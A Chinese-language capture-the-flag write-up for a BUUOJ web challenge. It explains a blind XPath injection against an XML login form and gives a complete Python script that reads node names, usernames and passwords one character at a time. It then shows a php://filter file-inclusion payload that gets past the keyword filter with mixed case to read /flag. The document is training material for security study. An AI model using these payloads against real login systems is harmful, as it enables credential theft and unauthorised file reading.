考点为xpath注入.

打开页面是个登录框,用户名密码随意输了一下,点击登录显示登录超时请刷新页面,f12可以看到用了token,更新的速度挺快的.刷新后登录,抓包,发现是login.php,并且用到了xml.尝试xxe发现不可行,要用xpath盲注.xpath注入详解

尝试注入发现若语句为真则显示非法操作,为假则显示用户名或密码错误.

上脚本:

import requests

def req(username):
    import re
    url = 'http://0a92d237-bdc8-443b-ae58-0693cf408aac.node3.buuoj.cn/login.php'
    password = ''
    s = requests.session()
    r = s.get(url).content
    re = re.search(r'value="(.*?)" />', r.decode('utf-8'))
    token = re.group(0)[7:-4]
    headers = {
        'Content-Type': 'application/xml',
    }
    data = '<username>'+username+'</username>''<password>'+password+'</password>''<token>'+token+'</token>'
    r = s.post(url,data=data,headers=headers).content
    if '非法操作' in r.decode('utf-8'):
        return 1
    else:
        return 0

flag = ''
for i in range(1,50):
    print(i)
    for j in range(32,127):
        #username = "' or substring(name(/*[1]),{},1)='{}' or '1".format(i,chr(j))
        #username = "' or substring(name(/root/*[1]),{},1)='{}' or '1".format(i,chr(j))
        #username = "' or substring(name(/root/accounts/*[1]),{},1)='{}' or '1".format(i,chr(j))
        #username = "' or substring(name(/root/accounts/user/*[1]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(name(/root/accounts/user/*[2]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(name(/root/accounts/user/*[3]),{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(/root/accounts/user[1]/username,{},1)='{}' or '1".format(i, chr(j))
        #username = "' or substring(/root/accounts/user[2]/username,{},1)='{}' or '1".format(i, chr(j))
        username = "' or substring(/root/accounts/user[2]/password,{},1)='{}' or '1".format(i,chr(j))
        if req(username) == 1:
            flag += chr(j)
            print(flag)
            break

拿到账号和密码后登录,注意到url处?file=welcome,f12后看到ZmxhZyBpcyBpbiAvZmxhZwo=
,base64解码后得知flag在/flag,用文件包含,过滤了php和base,大小写绕过:pHp://filter/convert.Base64-encode/resource=/flag,f12看到一串base64编码的字符串,解码得flag.

Categories:

Tags:

No responses yet

发表评论

电子邮件地址不会被公开。 必填项已用*标注

闽ICP备19027300号